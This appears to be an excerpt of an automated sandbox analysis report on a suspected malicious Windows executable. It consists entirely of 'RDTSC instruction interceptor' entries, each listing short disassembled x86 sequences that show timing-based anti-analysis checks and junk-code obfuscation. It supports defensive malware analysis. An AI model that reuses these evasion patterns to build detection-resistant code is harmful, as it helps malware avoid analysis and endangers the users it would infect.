                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B04BF8 second address: B04C0B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jg 00007FF3D0F68BA6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B04C0B second address: B04C10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B04DDA second address: B04DE4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF3D0F68BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B04DE4 second address: B04DEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B05CBD second address: B05D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF3D0F68BA8h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e jmp 00007FF3D0F68BB9h 0x00000013 nop 0x00000014 jmp 00007FF3D0F68BB1h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007FF3D0F68BA8h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 call 00007FF3D0F68BB9h 0x0000003a movzx esi, cx 0x0000003d pop edi 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push ecx 0x00000043 call 00007FF3D0F68BA8h 0x00000048 pop ecx 0x00000049 mov dword ptr [esp+04h], ecx 0x0000004d add dword ptr [esp+04h], 0000001Dh 0x00000055 inc ecx 0x00000056 push ecx 0x00000057 ret 0x00000058 pop ecx 0x00000059 ret 0x0000005a xchg eax, ebx 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007FF3D0F68BB8h 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B06CAD second address: B06CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B06CB1 second address: B06CB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B088EB second address: B088F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B09A5F second address: B09A69 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF3D0F68BACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B0A53F second address: B0A543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B0A543 second address: B0A558 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B0A558 second address: B0A562 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF3D0D8173Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B0A562 second address: B0A57F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF3D0F68BB3h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B0B111 second address: B0B11B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF3D0D8173Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B0AED6 second address: B0AEDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: ACC5A5 second address: ACC5AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF3D0D81736h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: ACC5AF second address: ACC5C1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF3D0F68BA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: ACC5C1 second address: ACC5C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: ACC5C5 second address: ACC5C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B0DB29 second address: B0DB2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: ACC5C9 second address: ACC5E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FF3D0F68BB0h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B0DB2D second address: B0DB31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B1480B second address: B14815 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FF3D0F68BA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B12B3D second address: B12B4D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF3D0D81736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B14DBB second address: B14DC5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF3D0F68BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B12B4D second address: B12BED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D81741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b movsx edi, bx 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007FF3D0D81738h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f mov ebx, dword ptr [ebp+122D35E3h] 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c sub ebx, dword ptr [ebp+122D3587h] 0x00000042 mov eax, dword ptr [ebp+122D0E59h] 0x00000048 jmp 00007FF3D0D8173Bh 0x0000004d push FFFFFFFFh 0x0000004f push 00000000h 0x00000051 push ebx 0x00000052 call 00007FF3D0D81738h 0x00000057 pop ebx 0x00000058 mov dword ptr [esp+04h], ebx 0x0000005c add dword ptr [esp+04h], 00000017h 0x00000064 inc ebx 0x00000065 push ebx 0x00000066 ret 0x00000067 pop ebx 0x00000068 ret 0x00000069 mov dword ptr [ebp+124537E6h], ecx 0x0000006f push eax 0x00000070 jp 00007FF3D0D81744h 0x00000076 push eax 0x00000077 push edx 0x00000078 jg 00007FF3D0D81736h 0x0000007e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B14F80 second address: B14F86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B14F86 second address: B14FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF3D0D81748h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B17E62 second address: B17EDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FF3D0F68BA8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 pushad 0x00000026 or dword ptr [ebp+122D18ECh], esi 0x0000002c or cx, AF14h 0x00000031 popad 0x00000032 push 00000000h 0x00000034 mov edi, dword ptr [ebp+122D376Fh] 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ebx 0x0000003f call 00007FF3D0F68BA8h 0x00000044 pop ebx 0x00000045 mov dword ptr [esp+04h], ebx 0x00000049 add dword ptr [esp+04h], 00000017h 0x00000051 inc ebx 0x00000052 push ebx 0x00000053 ret 0x00000054 pop ebx 0x00000055 ret 0x00000056 mov dword ptr [ebp+122D1C68h], esi 0x0000005c push eax 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B17EDB second address: B17EDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B18E57 second address: B18E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B18E5B second address: B18E5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B18055 second address: B1807C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007FF3D0F68BB6h 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B18E5F second address: B18EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 jmp 00007FF3D0D81747h 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FF3D0D81738h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a cld 0x0000002b push 00000000h 0x0000002d mov ebx, edi 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ecx 0x00000034 call 00007FF3D0D81738h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp+04h], ecx 0x0000003e add dword ptr [esp+04h], 0000001Bh 0x00000046 inc ecx 0x00000047 push ecx 0x00000048 ret 0x00000049 pop ecx 0x0000004a ret 0x0000004b push ebx 0x0000004c add edi, dword ptr [ebp+122D38F7h] 0x00000052 pop edi 0x00000053 and edi, 1A69D771h 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push ebx 0x0000005d pushad 0x0000005e popad 0x0000005f pop ebx 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B1814D second address: B18157 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF3D0F68BA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B18157 second address: B1815B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B19D7E second address: B19D93 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF3D0F68BACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B19FCD second address: B1A07C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF3D0D8173Ch 0x00000008 jnl 00007FF3D0D81736h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 mov ebx, dword ptr [ebp+122D370Fh] 0x00000019 jng 00007FF3D0D8173Ch 0x0000001f mov dword ptr [ebp+1247E12Dh], eax 0x00000025 push dword ptr fs:[00000000h] 0x0000002c call 00007FF3D0D81745h 0x00000031 push esi 0x00000032 sbb di, C95Ah 0x00000037 pop edi 0x00000038 pop edi 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 push 00000000h 0x00000042 push edx 0x00000043 call 00007FF3D0D81738h 0x00000048 pop edx 0x00000049 mov dword ptr [esp+04h], edx 0x0000004d add dword ptr [esp+04h], 00000019h 0x00000055 inc edx 0x00000056 push edx 0x00000057 ret 0x00000058 pop edx 0x00000059 ret 0x0000005a jc 00007FF3D0D81752h 0x00000060 call 00007FF3D0D81745h 0x00000065 mov dword ptr [ebp+1245335Eh], ecx 0x0000006b pop ebx 0x0000006c mov dword ptr [ebp+122D2FD0h], ecx 0x00000072 mov eax, dword ptr [ebp+122D1765h] 0x00000078 movsx edi, si 0x0000007b push FFFFFFFFh 0x0000007d mov edi, dword ptr [ebp+1247174Bh] 0x00000083 nop 0x00000084 pushad 0x00000085 pushad 0x00000086 push eax 0x00000087 push edx 0x00000088 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B204BE second address: B204C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B204C6 second address: B204D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FF3D0D81738h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B204D9 second address: B204DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B204DF second address: B204E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B204E3 second address: B20545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007FF3D0F68BA8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 mov dword ptr [ebp+12477BCCh], edi 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007FF3D0F68BA8h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 00000014h 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 mov bh, 68h 0x00000047 push 00000000h 0x00000049 mov edi, dword ptr [ebp+122D1C68h] 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push ecx 0x00000053 jns 00007FF3D0F68BA6h 0x00000059 pop ecx 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B1F6E7 second address: B1F6EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B1E589 second address: B1E58F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B1F6EB second address: B1F70A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF3D0D81744h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B23929 second address: B2392F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B2392F second address: B23936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B2079F second address: B207B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF3D0F68BB4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B24F34 second address: B24F39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B24F39 second address: B24F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B24F3F second address: B24F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jmp 00007FF3D0D8173Ch 0x00000010 pop edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B24F57 second address: B24FA9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FF3D0F68BAEh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D1CA1h], esi 0x00000012 push 00000000h 0x00000014 mov dword ptr [ebp+122D287Fh], edx 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push edi 0x0000001f call 00007FF3D0F68BA8h 0x00000024 pop edi 0x00000025 mov dword ptr [esp+04h], edi 0x00000029 add dword ptr [esp+04h], 0000001Ch 0x00000031 inc edi 0x00000032 push edi 0x00000033 ret 0x00000034 pop edi 0x00000035 ret 0x00000036 sbb bh, FFFFFFA4h 0x00000039 push eax 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B24FA9 second address: B24FAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B25EEB second address: B25F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ebx, dword ptr [ebp+122D21E1h] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007FF3D0F68BA8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b mov edi, dword ptr [ebp+122D1D2Dh] 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007FF3D0F68BA8h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000015h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d mov ebx, dword ptr [ebp+12451F30h] 0x00000053 xchg eax, esi 0x00000054 jmp 00007FF3D0F68BABh 0x00000059 push eax 0x0000005a push edx 0x0000005b push ecx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B28E4F second address: B28E84 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF3D0D81742h 0x00000008 jmp 00007FF3D0D81741h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007FF3D0D81755h 0x00000015 push eax 0x00000016 push edx 0x00000017 jno 00007FF3D0D81736h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B2BCCE second address: B2BCD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B30524 second address: B3052A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3052A second address: B3052E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B34C42 second address: B34C48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B34C48 second address: B34C85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FF3D0F68BB3h 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jc 00007FF3D0F68BBAh 0x00000015 mov eax, dword ptr [eax] 0x00000017 pushad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B34F20 second address: B34F38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D81744h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3B336 second address: B3B33C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3B33C second address: B3B348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3B348 second address: B3B366 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB4h 0x00000007 jns 00007FF3D0F68BA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3B366 second address: B3B36E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3B36E second address: B3B380 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BAEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3A0C3 second address: B3A0CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3A0CD second address: B3A0D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3A800 second address: B3A804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3A804 second address: B3A82C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF3D0F68BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF3D0F68BB8h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3A82C second address: B3A830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3FE35 second address: B3FE39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3FE39 second address: B3FE49 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF3D0D81736h 0x00000008 jc 00007FF3D0D81736h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
